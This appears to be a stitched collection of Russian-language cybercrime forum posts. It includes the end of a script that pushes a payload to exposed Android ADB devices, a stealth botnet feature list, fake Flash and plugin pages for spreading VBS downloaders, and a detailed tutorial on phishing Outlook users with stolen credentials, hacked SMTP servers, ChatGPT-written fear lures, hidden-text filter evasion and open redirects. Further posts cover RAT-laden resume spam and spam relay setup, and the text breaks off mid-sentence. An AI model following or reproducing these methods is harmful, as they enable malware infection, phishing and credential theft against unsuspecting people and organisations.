f = open(ippath, 'r')
for line in f.readlines():
if line == '':
continue
if not checkconnect(line.strip()):
print('Could not connect to ' + line.strip())
continue
print('Successfully connected to ' + line.strip())
install(line.strip())
os.system('adb kill-server')
f.close()
print('DONE!')
Имея открытые сурсы обоих скриптов, умельцы смогут объединить эти инструменты в один.
Итоги.
Вот таким нехитрым способом мы сможем распространить свою пакость по андроид-
устройствам. На момент написания статьи в Shodan насчитывалось 11.000+
уязвимых, перед ADB, устройств. Вся статья уместилась в 4 этапа, думаю
сложностей не должно возникнуть, так как постарался расписать всё максимально
подробно и понятно. Но если всё же вопросы остались, можешь задать их либо в
этой теме, либо у меня в лс на форуме. На этом всё, удачного спрединга!
by V1rtualGh0st | Special for XSS.is
SOCKS4 прокси-cервер с рандомизацией порта
- Биндшелл
- Функция скачивания и запуска произвольного файла
- Удалённое выполнение комманд
- Сбор информации о захваченой машине (пользователи, техн. характеристики,
версия и билд
ОС, аптайм, и другое...)
- Маскировка в системе методом перехвата API-ф-ций FindNextFileW,
FindNextFileA,
CreateProcessW, RegEnumValueW
- Невидимость в реестре и файловых мененджерах
- Обход файрволлов нестандартным методом внедрения кода в доверенный процесс
- Обход контроля компонентов файрволлов путём альтернативных способов
получения хендлов
процессов и запуска "злого" кода
- Шифрование тела бота, с использованием собственных алгоритмов. что
исключает его
обнаружение как по сигнатурам, так и евристическим анализаторм кода (во всяком
случее
пока)
- Удобная web-среда администрирования, с возможностью поиска проксей по
странам,
назначению разным количествам ботам разных комманд и удобным просмотром
статистики
=========
By Cr4sh
Выложен с согласия автора.
Здравствуйте!
Не нашел тут вменяемой темы по спаму и решил сам создать. Лью с 2013 года вполне успешно, хочу тут обсуждать вопросы по рассылкам и найти единомышленников, если такие есть. Тема очень объемная, хоть книгу пиши, но начну с беспокоящего на данный момент.
Инбокс зависит от софта?
Буквально вчера наткнулся на очень занятный момент и решил провести эксперимент и понять, играет ли софт важную роль в инбоксе? Не его скорость или гибкость, а может ли спамфильтр понять, что рассылка идет с конкретного софта и не пускать такие письма?
Взял два рассыльщика:
1. AMS enterprise. https://www.bspdev.ru/ Софт на данный момент
обслуживается, выходят новые версии.
2. MailerKing - древний софт, не обслуживается и те кто его делал уже канули
в лета.
Взял один почтовик, с которым работаю большую часть времени web.de
Все переменные в рассылке (кроме софта) одинаковые, а именно:
1. SMTP
2. SOCKS
3. Тело письма (просто текст "hi frend»).
4. Тема письма
Служебные заголовки дефолтные и в первом и во втором случае.
Но в AMS я тело письма брал не из редактора, а подтягивал из файла, чтобы уж точно этот параметр был максимально чистым. Максим (автор софта AMS) рекомендовал делать именно так.
Вот такой результат.
При прочих равных один софт шлет в инбокс, другой в спам.
Объем роли не играет, даже если отправить по больше писем, результат сохраняется.
А теперь главный вопрос, какой шлет в инбокс, а какой в спам? Делайте ваши
ставки господа!
Если интересна эта тема, отмечайтесь, предлагайте идеи или задавайте вопросы.
Приветствую дорогие друзья. Пишу, что бы поделиться с вами чем то крутым. Безобидно выглядящая страница для заражения. Направьте трафик на эти страницы и вы получите огромный ботнет. Используемый тип файла: vbs downloader / atom crypter для FUD r & s crypts (он преобразует ваш .net / native exe в файл .vbs). Почему. VBS? Потому что вы сможете сделать так, чтобы с Chrome было мало предупреждений или не было вообще. Chrome - самый популярный браузер, используемый 90% пользователей. Это важно.
Вот как выгляжит Chrome:
Мне нравится, как он извлекается из Adobe Flash Player, и он также пишет, что вашему антивирусу нужно, чтобы вы разрешали устанавливать новые программы. Это, друзья, удобно.
Когда они нажмут «Добавить в Chrome», появится всплывающее окно. Кажется знакомым, потому что все мы видели это окно раньше.
Теперь, чтобы загрузить вредоносный файл VBS, разместите на хорошем хосте, и у вас не будет предупреждений, разместите на плохом хосте, и он загрузит пустой файл VBS или заблокирует файл VBS.
Теперь им просто нужно нажать на файл VBS и Вуаля! У нас есть бот для нашего ботнета.
Теперь для Firefox:
Я думаю, что это говорит само за себя. «Установите недостающие плагины», если вы привыкли к Firefox, это точная страница. Так можно получить много ботов для себя. Вы даже можете купить трафик. Я рекомендую вам разместить его на взломанных веб-сайтах.
Так можно неплохо заработать Я надеюсь, что вы оцените и поставите благодарочку.
Ну вот и все, друзья. Я все еще работаю над страницами Edge / IE. Очевидно, что мы можем использовать эксплойты с IE и Edge. Что вы думаете об этом?
PS: страницы очень легко настраиваются. Это не обязательно должен быть Flash Player, хе, может быть, мы можем дать совершенно новый смысл "Java Drive By"? Может быть, Java больше подходит. Или, может быть, что-то еще. Дайте мне знать ваши мысли, друзья мои. Помог не скупись на благодарку.
По поводу трафика вы также можете обратиться ко мне. Жду в ЛС или Telegram: AlexanderBell
Hi. My name is Aels
(exploit.in,
xss.is).
Probably you also know me as an owner of the
github.com/aels/mailtools repository.
After a hundred questions like "how to inbox" I've finally decided to write
the full tutorial, covering all the small details of how to f*ck into outlook
boxes.
With reservations, this method also works for Office365. Used techniques are
the same because outlook and office365 share the same anti-spam engine, but
office365 boxes usually have additional signature-based spam filters,
configured by the admin. They are not that bad but sometimes make the inboxing
process harder. You can read more about these filters here:
This is only a "first part", but I've tried to make it enough for every beginner to launch and have results.
Click to expand...
{!} Honestly, if you want to send less than 10.000 emails per day, you can use services like falconsender.ru, postmarkapp.com or mailersend.com, and you will be just okay. But... if you are planning to send hundreds of thousands of emails per day, prepare a liter (or two liters) of coffee, and let's do it.
_This article is written in Russian, so, please, use a translator.
_
Начинаем.
правильно
Статистически, больше 60% корпов хостятся на outlook. Остальные - у av- компаний, и на своих серверах типа zimbra и проч. По-этому перед отправкой нам нужно отфильтровать нашу базу именно на аутлуки. Чтобы проверить, кто управляет почтой того или иного домена, достаточно взглянуть на mx-записи его dns-сервера. Чтобы проверять домены штучно, можно воспользоваться, например, расширением для хрома [https://chrome.google.com/webstore/detail/ip-address- and-domain-inf/](https://chrome.google.com/webstore/detail/ip-address-and- domain-inf/lhgkegeccnckoiliokondpaaalbhafoa) (вкладка Domain)
В случае feedly.com мы видим, что их почта управляется google.com
Для быстрой проверки и отсева опасных почт я написал санитайзер, который отфильтровывает опасные почты, управляемые av-компаниями (например perimeterwatch, proofpoint, fireeye и т.д.), или, в нашем случае, оставляет только почты, размещенные у конкретных компаний.
Validol : <https://github.com/aels/mailtools/tree/main/remove-dangerous- emails>
Этот валидатор предназначен для запуска на MacOS или Linux, поэтому для windows-пользователей я рекомендую взять linux-vps (купить взломанный, чтобы избежать жалоб можно например на xleet.pw), или использовать одноразовые сервера от THC, или использовать WSL (windows subsystem for linux - это ubuntu, встроенная в windows). Вот инструкция, как включить WSL на вашей машине: [https://devblogs.microsoft.com/comm...ilable-in- windows-10-version-2004-and- higher/](https://devblogs.microsoft.com/commandline/install-wsl-with-a- single-command-now-available-in-windows-10-version-2004-and-higher/)
Click to expand...
Для работы санитайзера нам понадобится python3 (а все остальное он установит сам при первом запуске). Установить питон можно этой командой:
Bash:Copy to clipboard
# this command for MacOS
brew install python3
# this command for Ubuntu users
apt install python3
Скачивать отдельно сам валидатор не нужно, т.к. он качается с гитхаба каждый раз в момент запуска. Запустим его вот с такими параметрами:
python3 <(curl -fskSL bit.ly/getsafemails) /path/to/mail_list.txt outlook
(*) лист с почтами может быть в любом формате, и помимо почт содержать любые данные (они останутся нетронутыми).
На выходе мы получим базу, содержащую только outlook-почты. С ней мы будем работать в дальнейшем.
Если вы не уверены в качестве своей базы, то чтобы не убивать smtp-сервера bounce-имейлами, так же базу нужно отфильтровать на несуществующие почты. Сделать это можно платно (после фильтрации через Validol, уже кратно дешевле) на сервисе https://debounce.io/.
Теперь нам нужны чистые smtp-сервера. В аутлук невозможно засунуть письма, отправленные с доменов, у которых не настроены записи dmark и spf. По-этому рассылка с шеллов, или с подменой домена отправителя нам не подходит.
Используя взломанные smtp-сервера мы избавляем себя от необходимости прогрева доменов и ip-адресов, которая встанет перед нами в случае использования собственных серверов (домены smtp-серверов уже теплые). Вебмейлинг же проигрывает smtp-серверам и по скорости (в десяток раз), и по стоимости (т.к. лимиты у бигов от 50 до 500 писем на аккаунт), и по удобству (делать свою webmail-ферму - плохое развлечение).
После десятков миллионов отправленных писем мне не удалось вывести закономерности или найти конкретные smtp-сервера, которые бы гарантированно доставляли хотя бы простой текст в inbox (это касается и доменов самого outlook, и ionos, и amazon-ses, и всех прочих). По-этому мы будем брать smtp- сервера откуда придется, и просто отправлять с них тестовое письмо в ящик outlook. Затем мы соберем те письма, которые попали в инбокс, и строками этих smtp-серверов будем пользоваться для дальнейших рассылок.
Мы можем сделать это бесплатно. Для этого нам нужен любой smtp-чекер (которых достаточно валяется в интернете). Я не стал доверять другим кодерам, и написал свой smtp-чекер:
https://github.com/aels/mailtools/tree/main/smtp-checker
(*)он так же предназначен для запуска на MacOS или Linux.
Перед его запуском убедитесь, что ip-адрес машины, с которой вы его будете использовать, не находится в black-листе у SpamHaus, иначе многие smtp-сервера будут отказывать нам в авторизации. Сделать это можно например на сайте https://check.spamhaus.org/. В моем случае, например, мой домашний адрес находится в черном списке:
Как правило все адреса, принадлежащие ISP (домашним интернет-провайдерам) находятся в блеке у SpamHaus, т.к. не предназначены для отправки почты с них напрямую. По-этому в данном случае нам все же придется воспользоваться VPS- сервером.
Если же вам все таки нужен действительно bullet-proof-сервер, то имейте ввиду, что как правило диапозоны ip таких серверов сильно испачканы, и при рассылке с них инбокс упадет минимум вдвое.
Самые стойкие к любой грязи сервера - это выходные ноды tor-сети.
Отправляемся к их списку: https://metrics.torproject.org/rs.html#toprelays,
И выбираем подходящую страну (я рекомендую Румынию, т.к. эта страна не сотрудничает с ФБР, и все же находится в Европе). Например возьмем ноду с ip- адресом 185.165.171.84. Затем идем на abuseipdb.com, чтобы узнать какому хостеру принадлежит этот ip-адрес.
Знакомые flokinet, которые принимают оплату в btc. Отлично. У них и купим vps- ку. После покупки обязательно проверим ее ip-адрес на чистоту в SpamHaus (т.к кто-то до нас мог уже запачкать этот ip-адрес). Чистый ip для нас важен еще и потому, что почти все smtp-сервера вместе с заголовками передают его в письме, и на его чистоту обращает внимание outlook. Подсеть Floki запачкана до нельзя, и это безусловно добавит штрафных баллов письму, но мы можем это стерпеть, если проделаем все остальные шаги правильно. Это цена отсутствия жалоб на сервер.
Кроме smtp-чекера нам так же понадобятся совершенно любые (любой свежести) листы, содержащие почты и пароли. Взять их из публичных раздач можно например на этих форумах:
https://nohide.space/forums/razdacha-baz-dlja-bruta.3/
https://forum.exploit.in/forum/96/
https://breached.vc/Forum-Databases
Покупать базы mail:pass (по-крайней мере для начала) я не рекомендую, т.к. все они как правило прошли через десяток рук, и инбокс у них будет не лучше, чем у баз с публичных раздач. Тем не менее, если вам нужна база с 70%+ валидом, я залил для вас 125,000 приватных mail:pass: https://satoshidisk.com/pay/CHatId.
(*) прошу прощения за символическую цену в 100$ - это необходимо, чтобы базу не убили любители халявы с кривыми руками. Вся сумма от ее продажи пойдет в благотворительные фонды.
Мой чекер автоматически определит поля, содержащие почты и пароли, по-этому нам подходит совершенно любой формат листов, будь то csv с любыми полями (включая mail и password) или sql-дампы баз.
Так же нам необходим тестовый ящик в самом outlook. В случае с outlook инбокс различается для почт, созданных в разных регионах. Если мы хотим делать рассылку по Америке, то мы будем регистрировать ящик с американского ip-адреса (если под рукой нет us-сокса, то можно использовать любое vpn-расширение для хрома, например [ZenMate](https://chrome.google.com/webstore/detail/free-vpn- zenmate-best-vpn/fdcgdnkidjaadafnichfpabhfomcebme)). Для примера, пусть наш ящик будет die-hard-us@outlook.com.
Не все smtp-сервера одинаковы. Помимо чистоты их ip-адреса и подсети в целом, они отличаются способом взаимодействия с почтовыми серверами адресатов (в нашем случае это Microsoft).
Их основные различия:
По-этому не все тестовые письма, отправленные с различных smtp-серверов, попадут к нам в inbox тестового ящика.
Запустим наш чекер со следующими параметрами (его так же не нужно предварительно скачивать):
python3 <(curl -slkSL bit.ly/madcatsmtp) /path/to/mail_pass_list.txt die- hard-us@outlook.com
Валидные smtp-доступы будут сложены в ту же папку, где лежит и исходный файл, с иминем mail_pass_list** _smtp** .txt.
Но не все из полученных нами доступов смогут отправить письмо, или доставить его в inbox. По-этому после окончания работы чекера мы отправимся в наш тестовый ящик и возьмем оттуда все smtp-доступы, которые попали в папку inbox. В зависимости от возраста и задроченности базы их может быть и 0.1%, и 90% (в случае покупки полностью валидной базы mail:pass) от общего числа. Лимиты на отправку писем у пользовательских smtp как правило малы (от 50 писем в случае gmail, до десятков тысяч в случае с корпоративными outlook или ionos аккаунтами), по-этому чем больше у нас smtp-доступов, тем лучше. В среднем 100 доступов достаточно, чтобы разослать 30-50 тысяч писем.
Соберем их в отдельный файл (для примера пусть это будет файл smtp_list.txt).
Когда мы делаем рассылку, письма через какое-то время будут помечены как спам, и в этом случае smtp, с которого мы отправили письма, будет помечен как грязный. Затем если с него отправить "чистые" письма, то они будут помечены как спам буквально в течение часа. Затем все чистые smtp-сервера, с которых было отправлено грязное письмо так же будут помечены как грязные. В outlook это не приговор, такие рассылки лишь поднимают "балл недоверия" smtp-серверам, и этот балл обнуляется со временем (от суток до недели). По-этому важно перепроверять smtp-сервера на inbox перед каждой рассылкой.
Так же как и у mail.ru, в outlook письма из папки inbox раз в 30 минут перепроверяются на спам еще раз и утекают в папку "спам" через несколько часов, когда достаточно пользователей нажмет над нашим письмом "это спам". Максимальное число писем стечет в папку спам через 5-6 часов. Чтобы этого избежать нужно класть максимальный процент писем в inbox изначально и максимально рандомизировать текст письма.
Не смотря на то, что почти все антиспам-системы в давние времена начинали свою разработку со SpamAssasin-а, теперь это сложные монстры. По работе антиспама в outlook почти нет публичной информации, однако есть несколько статей на тему работы антиспама в google. Эту историю борьбы со спамом от инженера Google я рекомендую для общего развития: <https://moderncrypto.org/mail- archive/messaging/2014/000780.html?hn>
Отвлеклись... Что ж... Теперь нам понадобится письмо.
В случае работы с корпоративными пользователями наша цель не продать что-то, а заставить пользователя выполнить действие, по-этому классический прием "найдите боль и предложите избавление" не работает. Зато отлично работает страх. У напуганного пользователя отключается критическое мышление и он попадется на нашу удочку намного легче.
Больше всего человек боится потерять что-то важное: аккаунт, работу, шанс.
Мы не можем обфусцировать заголовок письма и его придется написать максимально нейтральным, чтобы не попасть под спам-фильтр. Например "System notification" или "Invoice status #347334". А в теле письма в общем случае мы можем писать что угодно, потому что потом спрячем от антиспам-фильтра outlook все "тревожные" слова.
Для общего понимания, какие письма дают хороший CTR, вот пример письма, которое я использовал в работе неделю:
В этом письме к получателю обращаются вежливо, аргументированно и настойчиво - с позиции начальника. И это работает.
Я не рекомендую пользоваться шаблонами фишинговых писем, найденных в интернете (только если вы точно знаете, что делаете), т.к. помимо необходимости знания html и css, все они давно детектируются spam-фильтрами, и переписывать их и обфусцировать у вас займет очень много сил и времени.
Чтобы хорошо писать фальшивые письма нам нужно знать поведенческую психологию. Для общего развития я очень рекомендую следующие книги:
Но... на самом деле теперь нам все это не нужно. На сцену выходит ИИ. После десятков писем, заказанных у разных копирайтеров, ChatGPT стала настоящим гемом, т.к. на удивление, написанные ей письма рвут по эффективности любого копирайтера. Именно по-этому мы обратимся к ней, а не к живому человеку:
ChatGPT доступна не для всех регионов, и если вы не можете зарегистрироваться, то используйте европейский или американский ip-адрес, и принимайте смс на физический номер соответствующей страны. E-sim нужной страны можно купить за ~20$ на сайте [prepaid-global.com](https://prepaid- global.com/).
Click to expand...
Отличительная особенность этого ИИ - его доброта, вежливость и понимание сути проблемы. По-этому в руках мошенника chatGPT превращается в совершенное зло. Просто посмотрите как легко она разводит пользователя на верификацию:
Это восхитительно красиво и ужасно.
Теперь все же напишем письмо для себя:
Теперь попросим ChatGPT рандомизировать текст письма для нас:
Да - вот так легко и просто мы получаем эффективное письмо. Сохраним полученный текст в файл lure.html
Прекрасно, если вы дошли до этого момента. Вот музыка для подзарядки в пути:
Сходим попить кофе, чтобы все прочитанное спокойно улеглось у вас в голове.
Spintax-рандомизации по-прежнему недостаточно для того, чтобы наше письмо не детектировалось спам-фильтрами. Оно по-прежнему содержит тревожные слова, направленные на привлечение внимания пользователя. Это слова, например: invoice, important, urgent, buy и многие другие. Неполный список таких слов мы возьмем из статьи [https://blog.hubspot.com/blog/tabid...ltimate-list-of- email-spam-trigger- words.aspx](https://blog.hubspot.com/blog/tabid/6307/bid/30684/the-ultimate- list-of-email-spam-trigger-words.aspx). В этот же список входят имена брендов, например "Paypal", "USPS", "Amazon" и др. Им не место в письмах, отправленных не с их родных доменов. Перечитаем наше письмо еще раз найдем слова, которые цепляют наше внимание и поднимают тревогу.
Не пытайтесь скрыть их через замену букв на визуально похожие (например латинскую "а" на киррилическую). Все известные мне спам-фильтры автоматически определяют язык, на котором написано письмо, и если оно содержит символы разных локалей в одном слове, то балл недоверия к нему резко поднимается. В случае, например, со SpamAssasin, можно прочесть об этом по ссылке:
https://spamassassin.apache.org/full/3.1.x/doc/Mail_SpamAssassin_Conf.html
в разделе "Language Options". И протолкнуть такое письмо в инбокс будет сильно сложнее (но не невозможно). С "тревожными" словами мы будем расправляться через "zero-font".
Слово "zero-font" означает шрифт нулевого размера. На самом деле это не совсем так. Есть несколько способов скрыть слова на странице от глаза пользователя через css, например:
И несколько других свойств, которые позволят убрать с глаз долой не нужные части письма. Проблема с такими методами в том, что почти все они детектируются антиспам-фильтрами и лишь вредят. Свойство, которое на данный момент не детектируется и не вызывает проблем у outlook, это width .
Чтобы избавиться от "тревожных" слов в письме, скрывать их бессмысленно, но вот разбить их на несколько частей невидимыми блоками с другим текстом - без проблем. В SpamAssasin (и, вероятно, во многих других антиспам-фильтрах) для составления детектов используются "триграмы" - это три буквы, идущие друг за другом. То есть в слове Viagra четыре триграма: via,iag,agr,gra. И по наличию этих четырех триграмов в теле письма ему будет дан вердикт "спам". В outlook пошли немного дальше, и чистота письма считается не только по наличию определенных триграмов, но и по расстоянию между ними (концентрации bullshit). По-этому тревожные слова мы будем разбивать другими фразами длиной 3 и более слов.
Сначала добавим к письму блок css-свойств, чтобы обеспечить нашему волшебному блоку нулевую длину. Изначально текстовые строки имеют тип inline и их собственная длина игнорируется браузером. Однако, если сменить их тип на inline-block, то браузер начинает уважать их аттрибут width .
Добавим к письму следующий html-код:
<style type="text/css">u { display: inline-block; width: 0; overflow: hidden; white-space: nowrap; }</style>
В нем тегу u мы задаем строчно-блочный тип, нулевую длину, команду скрывать переполнение его текстом, и запрещаем перенос строк, чтобы он не вырос в высоту. Затем вычитываем наше письмо, и каждое слово, которое нам не нравится разбиваем тегом u, содержищим какую-то фразу. Например:
But it's not about being another "ho<u>seems not yet </u>rny bb slut",
B vio-la, мы избавились от слова horny. И наше письмо начинает выглядеть как-то вот так:
Теперь перед нами встает вопрос, как получить от получателя желаемое: или клик по ссылке, или запуск аттача.
Прежде всего хочу сказать, что голый текст в письме вызывает больше доверия и часто дает больше конверсий, чем пестрое письмо, напичканное изображениями, т.к. пользователи устали от ярких маркетинговых писем.
Outlook может анализировать только те изображения, которые включены в письмо через img-тег и закодированы внутри src-аттрибута с помощью data-url. Так же такой способ включения изображений в письмо увеличивает его вес. Это не несет никакой пользы, т.к. изображения, закодированные через data-url все равно не отображаются, если письмо попало в папку spam. По-этому мы будем включать в код письма только изображения, размещенные у нас на серверах. Домен, откуда включено изображение так же должен иметь хороший traffic-rank (об этом мы поговорим в следующей главе).
Картинки удобно размещать на content-серверах github или даже telegraph. Но пожалуйста не размещайте их в discord , т.к. его домены сильно испачканы начинающими распространителями вирусов.
Десять лет назад был популярен спам с одним большим рисунком, на котором
размещался весь текст. Т.к. outlook не может анализировать изображения,
подгружаемые из вне, то к таким письмам сформировалось недоверие со стороны
его антиспам-системы. С другой стороны, изображения используются повсеместно в
маркетинговых письмах.
Безопасная концентрация изображений для outlook, вымеренная экспериментально -
одно изображение на 30 строк кода и текста.
В SpamAssasin используются другие пропорции. Прочесть об этом для общего
образования можно по этим ссылкам:
https://svn.apache.org/repos/asf/spamassassin/trunk/rules/20_html_tests.cf
https://www.quora.com/How-does-Spam-Assassin-calculate-image-to-text-ratios
Изображения часто включаются с указанием их размеров в теле img-тега:
<img src="https://path-to-img" width="100" height="50"/>
По этим параметрам outlook может вычислить размер изображения. Однако, если их не указывать, то браузер отобразит изображение в его натуральном размере.
<img src="https://path-to-img"/>
Такой подход нам тоже не подходит, т.к. антиспам outlook не доверяет таким изображениям. Однако мы можем указать ширину в процентах от ширины родительского блока:
<img src="https://path-to-img" width="100%"/>
В этом случае изображение займет всю ширину родительского блока, а высота будет автоматически посчитана браузером, чтобы изображение сохранило свои пропорции.
И такой подход нам не подходит в чистом виде. Т.к. если изображение включено таким образом сразу в тело письма, то outlook понимает, что оно займет всю ширину экрана. Однако, если мы поместим изображение, например, в ячейку таблицы, или внутрь нескольких элементов div, то такое изображение без проблем будет принято и пропущено антиспам-фильтром:
HTML:Copy to clipboard
<table>
<tbody>
<tr>
<td><b>text with zero-font</b></td>
<td width="100%"><img src="https://path/to/image" width="100%"/></td>
<td><b>text with zero-font</b></td>
</tr>
</tbody>
</table>
В этом случае антиспам не сможет вычислить размер изображения и пропустит его.
Если мы хотим добавить анимацию в письмо, то не будем использовать gif- изображения, т.к. они имеют сильно ограниченную палитру цветов и большой размер. Уже несколько лет все браузеры поддерживают более подходящий для нас формат - "анимированные png-файлы", имеющие расширение .apng. Они имеют отличную степень сжатия и почти неограниченную палитру цветов. Так же браузеры поддерживают стриминг таких изображений и начнут их отображение в браузере не дожидаясь полной их загрузки. Таким способом мы можем даже иммитировать видео без звука. Снабдить видео субтитрами можно на многочисленных сервисах, например здесь: [clideo.com/add-subtitles-to-video](https://clideo.com/add- subtitles-to-video), а сконвертировать видео в формат .apng можно здесь: ezgif.com/video-to-apng.
Отлично. С изображениями разобрались, переходим к ссылкам.
Антиспам-фильтры не имеют права проверять содержимое ссылок, т.к. иначе они бы регулярно наступали на важные ссылки подтверждений активации, верификации, удаления аккаунта и тому подобные. Однако, outlook как минимум проверяет следующие параметры у каждой ссылки:
По этой причине мы не можем использовать редиректы, размещенные на шеллах, или любых других взломанных сайтах, cPanels и т.д. Потому что шеллы как правило добываются через публичные уязвимости и запачканы многими спамерами уже задолго до нас. Так же домены шеллов имеют как правило около-нулевой traffic- rank, и расположены на shared-хостингах вместе с сотнями других. Использование CloudFlare частично решает эту проблему, но мы выберем другой путь.
Для отличного инбокса нам нужны ссылки на доменах, собирающих большой объем трафика, зарегистрированных давно, часто используемых, и ссылающиеся на ip- адреса, на которых не замечено вредоносной активности.
Идеально для этого подходят click-tracker-ы популярных банерных серверов, т.к. каждый из них - это открытый редиректор. Найти их можно через расширение для хрома [Redirect-path](https://chrome.google.com/webstore/detail/redirect- path/aomidfkchockcldhbkggjokdkkebmdll?hl=de), покликав по банерам на разных сайтах (не забудьте перед этим выключить ad-blocker).
Вот несколько примеров редиректов, которые я нашел за 15 минут:
Code:Copy to clipboard
https://track.adform.net/adfserve/?bn=12345;redirurl={{url}}
https://secure.adnxs.com/seg?redir={{url}}
https://p.rfihub.com/cm?forward={{url}}
https://tags.bluekai.com/site/35702?redir={{url}}
https://ssum.casalemedia.com/usermatchredir?s=183875&cb={{url}}
https://sync.mathtag.com/sync/img?cs_wd_sy=1&dp=43&redir={{url}}
Каждого такого редиректа нам хватаит на рассылку ~50 тысяч писем без рандомизации остальной части ссылки и без добавления мусорных параметров. Затем дадим им неделю отдыха, и они снова начнут ложиться в инбокс. Результат
Однако что, если нам нужно очень много трастовых редиректов? Для этого нам нужно посетить очень много сайтов через банеры. Fuck it. За нас уже собрали миллионы ссылок (и нам не нужно за это платить).
Парни из UrlTeam собрали все адреса, куда ведут популярные шортнеры ссылок. И
среди них есть много-много открытых редиректов. Вот полный архив их работы по
датам:
https://archive.org/details/UrlteamWebCrawls
Отсюда мы возьмем для примера архив ссылок, куда ведет давно закрытый шортнер
goo.gl (или любой другой):
https://archive.org/details/urlteam_2023-01-14-00-17-02
И соберем сотни трастовых редиректов эксклюзивно для себя. Для этого...
Вот то, о чем нам осталось узнать:
Если информация первой части статьи вас заинтересовала, вы можете купить у
меня полный курс и месяц моей поддержки (чтобы у вас все получилось). Цена
такого счастья - 1999$.
Вот коммерческий топик с отзывами: https://xss.is/threads/88805/
Связаться со мной можно в личных сообщениях или сразу в telegram:
https://t.me/crazymark.
Если курс вас разочарует, напишите мне в течение недели, и я верну вам деньги.
Click to expand...
Профита вам. Жду вас во второй части нашей истории.
Ссылка для распространения гайда вне xss.is: <https://telegra.ph/Inboxing- corp-mailsoutlook-Inboksim-korpyautluk-02-03>
Обучение основ белого Арбитража: Теория - Практика
Обучение стоит не дешево !
В ЛС форума
Пытаюсь самостоятельно разобраться в теме спама. Чтобы делать рассылку под
свои нужды. Сколько читал тем, в основном все используют PowerMTA (PMTA).
С поиском этого софта и документации возникли проблемы, т.к. ничего толкового
до сих пор не нашел.
Если у кого есть PMTA или документация по нему, буду признателен.
Возможности:
Установка и конфигурация Exim4 почтового сервера, отвечающего за отправку и
прием писем
Установка и настройка DNS сервера (необходим домен, который будет выступать в
роли NS)
Генерация любого количества сабдоменов
Создание сотен и тысяч почтовых ящиков (релеев) на одном VPS сервере
Настройка протоколов и цифровых подписей SPF, DKIM, DMARK, MX, Hide IP
Создание неограниченного количества почтовых ящиков, вида -
name@yourdomain.com
Для облегчения сбора отбоек, вся входящая почта со всех почт перенаправляется
на один, указанный вами почтовый ящик
Генерация файла импорта релеев для АМС Entreprice
Требования:
VPS сервер на 128 МБ памяти. Для быстрой рассылки большого количества писем
без зависаний сервера, рекомендуется 512 МБ
Топливо для скрипта = IP адрес сервера, домен, root логин и пароль
Для создания ДНС сервера достаточно иметь всего 1 IP адрес!
Предустановленная ОС - Debian 7 x64, без ISP панели.
Особенности работы:
Сотня SMTP серверов создается и конфигурируется автоматически приблизительно
за 1 час.
Подготовка к запуску скрипта занимает буквально несколько секунд.
Данные о серверах, которые не удалось по тем или иным причинам
сконфигурировать (сервер завис, сбой связи и тп) - сохраняются для последующей
реконфигурации.
После завершения работы скрипта, при условии подготовленного проекта для
рассылки, импортировать созданные релеи и запустить спам можно в течении
нескольких секунд
Созданные скриптом SMTP сервера имеют максимальный траст, так как
соответствуют всем требованиям спам-фильтров
Скорость рассылки писем ограничена только мощностью сервера. Сотня SMTP
серверов способны разослать порядка 30-40 миллионов писем в сутки
Привет.
Только не подумайте, что я какой то альтруист, у меня есть причина слить тему.
Причина:
К сожалению, абсолютно на всех форумах, в модерацию, администрацию и
"проверяющих" с гарантами, залезло какое то дно. Это я о всевозможных
сеошниках и сммщиках, но ладно ещё сеошники, это ещё полбеды, но когда это
какие то ну совершенно примитивные профессии, типа накрутчиков лайков или типа
бывших продавцов асек. Про продавцов асек, думаю все старожилы поняли о ком я
говорю. Вообщем эта тема плавает у гавноадминов, возможно уже где то продают,
хотя думаю у них ума не хватит, для реализации её "под ключ", раз до сих пор
не запустили такого сервиса, несмотря на то, что тему вытянули.
Метод:
Заказываем или делаем сами, скрипт для парсинга вакансий. Выбираем нужную нам
специализацию, страну и всё что угодно. Например мы ищем коммерческие
организации штата Техас, или общепит штата Калифорния. Это может быть всё что
угодно. Собранные контакты, добавляем в базу и откладываем для третьего этапа.
Далее находим в интернете или заказываем в интернете же, резюме под
интересующее нас направление. Если это общепит, то одно, а если это
коммерческие организации Детройда, то разумеется совершенно другое резюме.
Натягиваем наше резюме на малварь, тут по вкусу, я rat использую и рекомендую
для ювелирной работы использовать именно этот инструмент. Переходим к
заключительному этапу - спам рассылка. Метод с различными адаптациями применим
и в иных плоскостях, например рассылка прайсов, коммерческих предложений,
презентаций и иного. Отличие лишь в источниках для парсинга баз. В любом
случае объект как минимум откроет письмо, ну а как максимум скачает и откроет
файл.
Что следует учитывать:
Главное необходимо знать, что любой документ, имеет подпись компьютера, на
котором он создавался. И, возможно, по крайней мере у меня есть такое
подозрение, что и локализацию сохраняет. По крайней мере есть некоторая
особенность, что созданные в европе документы, палятся дефендером в америке,
более нежели созданные в америке. Но это может и паранойя, не обращайте на это
внимание.
_
Абсолютно проходной документ word, стоит в пределах 1000$, то есть с нулевым
детектом и проходом через любые email сервисы. Но ни в коем случае не ищите
это в рунете, в рунете кинут скорее всего. Специалистов нет, есть много людей,
кто пишет длинные статьи на эту тему и горячо чего то обсуждают, но 100%
боевой документ, не сделает никто. Тоже можете не обращать внимание на этот
пункт, то такое.
_
Если вы используете rat, то достаточно будет получить доступ в одно "хорошее"
учреждение, где просто заменить их файлы на свои. И тогда это учреждение будет
распространять ваши файлы, отправляя своим клиентам ли, партнёрам ли, свои
рабочие документы. Это реализуется тоже элементарно, выкачиваете документы
интересующих форматов, прошиваете и загружаете с заменой.
Распространяйте, делитесь, размножайте. Авторство дарю этому форуму.
Ну и можете обосрать конечно же, предложить что то своё, безусловно гораздо
более глубокое, умное и крайне эффективное.
Добрый день.
Я часто слышу, что большинство ботов - управляется по каналам IRC. Но почему? Зачем так? Просто удобно? А какие - преимущества?
А как организовывается данный канал?
Может у вас есть какие-нибудь примеры?
Господа, я буду признателен за любую информацию по данному вопросу (желательно подробно)!
Спасибо!
--
mr. Eof
Добро пожаловать! Если у вас есть вопросы по настройке и оптимизации Google Ads PPC (поиск), вы попали по адресу. Я здесь, чтобы помочь вам разобраться в тонкостях рекламных кампаний, поделиться советами и ответить на любые ваши вопросы. Присоединяйтесь к обсуждению, получайте ценные инсайты и помогайте друг другу улучшать результаты. Давайте создавать активное и полезное сообщество вместе!
Задавайте свои вопросы и делитесь опытом, всем профита!
Сегодня я расскажу вам о своем опыте заработка с помощью дорвеев в интернете.
Если вы интересуетесь веб-маркетингом или заработком в сети, то наверняка
слышали об этом способе. Но сначала, давайте разберемся, что такое дорвеи.
Дорвей (от англ. doorways) – это специально созданные веб-страницы,
оптимизированные для поисковых систем, с целью привлечения трафика и
